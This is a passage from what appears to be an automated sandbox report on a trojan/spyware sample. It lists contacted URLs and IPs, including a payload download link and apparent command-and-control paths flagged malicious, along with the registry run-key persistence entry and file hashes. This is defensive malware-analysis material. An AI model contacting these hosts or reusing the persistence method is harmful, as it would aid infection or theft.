                            https://duckduckgo.com/ac/?q=M61Ae5o9b.8.drfalse
                              		high
                              http://www.rw-bau.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.madisoncountylincoln.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.casar.com/assunto/organizacao/explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.metatv.appexplorer.exe, 00000004.00000002.584502379.0000000006162000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://a.uguu.se4DpSC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000026DE000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.brunaeleandro.comwww.brunaeleandro.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.funhood.lifewww.funhood.lifeexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.casar.com/assunto/casamentos/decoracao-de-casamento/explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.evelycosmetique.comwww.evelycosmetique.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://search.yahoo.com?fr=crmas_sfpfM61Ae5o9b.8.drfalse
                                		high
                                https://www.newtonsoft.com/jsonLvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.myprojoints.comwww.myprojoints.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.groupekoriolis.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.casar.com/assunto/lua-de-mel-2/explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.33347.netwww.33347.netexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.groupekoriolis.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.mejawajib.shopexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.casar.comexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.madisoncountylincoln.com/explorer.exe, 00000004.00000002.594853816.00000000160EE000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005E0E000.00000004.10000000.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.brunaeleandro.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.findmyoriginstory.comwww.findmyoriginstory.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.funhood.lifeexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://embed.typeform.com/embed.jsexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.findmyoriginstory.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.mnsmanagmentsolutions.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.sistemadanetflix.site/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.evelycosmetique.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://connect.facebook.net/en_US/fbevents.jsexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.casar.com/assunto/noivas/dicas-para-noivas/explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://a.uguu.se/fwvfviJb.dat=SC_0017384.exe, Lvdnyvcvr.exe.0.drfalse
                                        		high
                                        http://www.babupaul.comwww.babupaul.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.sistemadanetflix.sitewww.sistemadanetflix.siteexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000026DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.pinterest.com/casarpontocomexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.mejawajib.shopwww.mejawajib.shopexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.myprojoints.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000003.533668803.000000000ED27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.575675145.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.592015514.000000000ED28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.386129776.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.icste-conference.orgexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.33347.netexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.rw-bau.comwww.rw-bau.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoM61Ae5o9b.8.drfalse
                                                		high
                                                http://www.babupaul.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.casar.com/assunto/casamentos/casamentos-reais/explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.youtube.com/casarpontocomexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=M61Ae5o9b.8.drfalse
                                                    		high
                                                    http://www.funhood.life/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchM61Ae5o9b.8.drfalse
                                                      		high
                                                      https://www.casar.com/assunto/cha-de-panela/explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.sistemadanetflix.siteexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.jsexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.jsexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=M61Ae5o9b.8.drfalse
                                                            		high
                                                            http://james.newtonking.com/projects/jsonLvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://www.casar.com/assunto/noivas/vestidos-de-noiva/explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.findmyoriginstory.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://ac.ecosia.org/autocomplete?q=M61Ae5o9b.8.drfalse
                                                              		high
                                                              https://br.enterprise.wibson.io/banner.js?siteId=78509e00-767d-4326-9529-f0d523c8137cexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://plus.google.com/explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://search.yahoo.com?fr=crmas_sfpM61Ae5o9b.8.drfalse
                                                                  		high
                                                                  http://www.mejawajib.shop/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.mnsmanagmentsolutions.comwww.mnsmanagmentsolutions.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.madisoncountylincoln.comwww.madisoncountylincoln.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.rw-bau.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.icste-conference.org/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.icste-conference.orgwww.icste-conference.orgexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.babupaul.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.groupekoriolis.comwww.groupekoriolis.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.newtonsoft.com/jsonschemaLvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.mnsmanagmentsolutions.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.myprojoints.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.emprendizajesocial.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.emprendizajesocial.comwww.emprendizajesocial.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://cdnjs.cloudflare.com/ajax/libs/es5-shim/4.5.14/es5-shim.min.jsexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://urn.to/r/sds_see5badSC_0017384.exe, 00000000.00000002.385968571.000000000419A000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.401744017.0000000006980000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.nuget.org/packages/Newtonsoft.Json.BsonSC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.metatv.appwww.metatv.appexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://instagram.com/casarpontocomexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ajuda.casar.comexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=M61Ae5o9b.8.drfalse
                                                                            		high
                                                                            http://www.33347.net/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.evelycosmetique.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            54.85.86.211
                                                                            		brunaeleandro.comUnited States
                                                                            		14618AMAZON-AESUStrue
                                                                            172.67.152.24
                                                                            		www.madisoncountylincoln.comUnited States
                                                                            		13335CLOUDFLARENETUStrue
                                                                            74.208.236.131
                                                                            		www.findmyoriginstory.comUnited States
                                                                            		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                            217.160.0.229
                                                                            		www.emprendizajesocial.comGermany
                                                                            		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                            172.67.194.225
                                                                            		www.metatv.appUnited States
                                                                            		13335CLOUDFLARENETUStrue
                                                                            188.40.83.211
                                                                            		a.uguu.seGermany
                                                                            		24940HETZNER-ASDEfalse

                                                                            Private

                                                                            IP
                                                                            192.168.2.1

                                                                            General Information

                                                                            Joe Sandbox Version:37.0.0 Beryl
                                                                            Analysis ID:831200
                                                                            Start date and time:2023-03-21 09:09:12 +01:00
                                                                            Joe Sandbox Product:CloudBasic
                                                                            Overall analysis duration:0h 12m 17s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:light
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                            Number of analysed new started processes analysed:16
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:1
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • HDC enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample file name:SC_0017384.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@26/13@11/7
                                                                            EGA Information:
                                                                            • Successful, ratio: 50%
                                                                            HDC Information:
                                                                            • Successful, ratio: 72.3% (good quality ratio 66.2%)
                                                                            • Quality average: 73%
                                                                            • Quality standard deviation: 31.5%
                                                                            HCA Information:
                                                                            • Successful, ratio: 98%
                                                                            • Number of executed functions: 0
                                                                            • Number of non-executed functions: 0
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                                                            • TCP Packets have been reduced to 100
                                                                            • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                            • Execution Graph export aborted for target SC_0017384.exe, PID 5876 because it is empty
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            09:10:09API Interceptor10x Sleep call for process: SC_0017384.exe modified
                                                                            09:10:21API Interceptor98x Sleep call for process: powershell.exe modified
                                                                            09:10:49AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Lvdnyvcvr "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
                                                                            09:10:57AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Lvdnyvcvr "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
                                                                            09:11:00API Interceptor606x Sleep call for process: explorer.exe modified
                                                                            09:11:05API Interceptor20x Sleep call for process: Lvdnyvcvr.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            No context

                                                                            Domains

                                                                            No context

                                                                            ASNs

                                                                            No context

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Lvdnyvcvr.exe.log

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1570
                                                                            Entropy (8bit):5.357969604744043
                                                                            Encrypted:false
                                                                            SSDEEP:48:MxHKXwYHKhQnowHBtHoxHhAHKzvAHKgmHKKHKdHKBo:iqXwYqhQnowhtIxHeqzIqTqKqdqy
                                                                            MD5:01403378423BC80FF1C71B821B33B07C
                                                                            SHA1:B86FAFEDD98B3237252375E7DAA5215A20C4E0D1
                                                                            SHA-256:D29D2FC27260201D6E5B6AFDC218CD254AE25E692C2935A1E07B50922114FDDE
                                                                            SHA-512:FA447D7B7146B128265A12610F56CB8E3FE5A191A1AC7EEFED644D6C2FB0D8DB2FDF0075058BD2DF939725640DE5432B3F8C3A6E75CE3292CF9952C8C127C0D9
                                                                            Malicious:false
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\86d45445dab86720724016051271f5f9\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SC_0017384.exe.log

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\SC_0017384.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:modified
                                                                            Size (bytes):1570
                                                                            Entropy (8bit):5.357969604744043
                                                                            Encrypted:false
                                                                            SSDEEP:48:MxHKXwYHKhQnowHBtHoxHhAHKzvAHKgmHKKHKdHKBo:iqXwYqhQnowhtIxHeqzIqTqKqdqy
                                                                            MD5:01403378423BC80FF1C71B821B33B07C
                                                                            SHA1:B86FAFEDD98B3237252375E7DAA5215A20C4E0D1
                                                                            SHA-256:D29D2FC27260201D6E5B6AFDC218CD254AE25E692C2935A1E07B50922114FDDE
                                                                            SHA-512:FA447D7B7146B128265A12610F56CB8E3FE5A191A1AC7EEFED644D6C2FB0D8DB2FDF0075058BD2DF939725640DE5432B3F8C3A6E75CE3292CF9952C8C127C0D9
                                                                            Malicious:true
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\86d45445dab86720724016051271f5f9\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):5829
                                                                            Entropy (8bit):4.8968676994158
                                                                            Encrypted:false
                                                                            SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                                                            MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                                                            SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
